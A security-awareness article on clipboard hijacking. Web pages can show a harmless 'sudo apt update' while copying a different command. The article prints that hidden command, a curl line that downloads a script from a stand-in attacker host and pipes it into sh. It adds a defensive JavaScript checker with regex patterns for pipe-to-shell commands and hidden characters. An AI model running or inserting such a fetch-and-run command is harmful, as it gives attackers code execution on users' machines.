Programmers, sysadmins, security researchers, technology enthusiasts, and I often copy and paste configuration and installation commands from websites that give quick instructions, instead of retyping each command. However, this habit is dangerous and can get your system hacked, because the command you copy may not be the command you paste.
A security expert has performed a simple trick that will make you think twice before copying and pasting any commands from untrusted websites.
Vulnerability from the Clipboard
Recently, Gabriel Friedlander, founder of the Wizer platform, which specializes in security awareness training, tested a simple but surprising hack that will make you cautious when copying commands from websites.
Copying frequently used commands from a website (ahem, StackOverflow) and pasting them into a command-line tool such as Windows CMD or a Linux terminal is a familiar habit for novice programmers and lazy people like me.
But Friedlander warns that a web page can secretly replace the content of your clipboard, so what is actually copied to your clipboard can be vastly different from what you intended to copy.
Worse yet, without the necessary checks, programmers may only realize their mistake after pasting the text, by which time it may be too late.
You can try this hack at https://www.wizer-training.com/blog/copy-paste.
Try copying the line on the web page, then paste it into Notepad or anywhere else.
You will see that the pasted result is not
sudo apt update
but
curl http://attacker-domain:8000/shell.sh | sh
Many people think they are copying a seemingly harmless Linux system update command, but the clipboard actually holds a command that downloads shell.sh and executes it once the download is complete.
People pasting the text may be under the impression that they copied the familiar, harmless sudo apt update command, which is used to fetch updates for software installed on the system.
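The mismatch described above can be checked mechanically before anything reaches a terminal. The following is an added example, not code from Wizer or from this page: it compares the text the reader selected with the text that landed on the clipboard and flags risky content. The names auditClipboard and RISKY_PATTERNS are hypothetical, and the sample strings are the two commands quoted above.

```javascript
// Added defensive example; auditClipboard and RISKY_PATTERNS are hypothetical names.
// In a browser, the two inputs could come from window.getSelection().toString()
// and navigator.clipboard.readText(); here they are plain strings so it runs in Node.

const RISKY_PATTERNS = [
  // A download piped straight into a shell, like the command shown on this page.
  { id: "pipe-to-shell", re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash|zsh)\b/i },
  // Line breaks and other control characters (tab excluded): a line break can
  // submit the command to the shell before the reader has reviewed it.
  { id: "control-chars", re: /[\u0000-\u0008\u000a-\u001f\u007f]/ },
  // Zero-width and bidirectional-override characters that hide or reorder text.
  { id: "invisible-unicode", re: /[\u200b-\u200f\u202a-\u202e\u2066-\u2069]/ },
];

// Collapse whitespace so harmless spacing differences are not reported.
function normalize(text) {
  return text.replace(/\s+/g, " ").trim();
}

// Returns { safe, findings } for one copy operation.
function auditClipboard(selectedText, clipboardText) {
  const findings = [];
  if (normalize(selectedText) !== normalize(clipboardText)) {
    findings.push("mismatch");
  }
  for (const { id, re } of RISKY_PATTERNS) {
    if (re.test(clipboardText)) findings.push(id);
  }
  return { safe: findings.length === 0, findings };
}

// Constructed sample input, using the two commands quoted on this page.
const shown = "sudo apt update";
const pasted = "curl http://attacker-domain:8000/shell.sh | sh";
console.log(auditClipboard(shown, pasted));
console.log(auditClipboard(shown, shown));
```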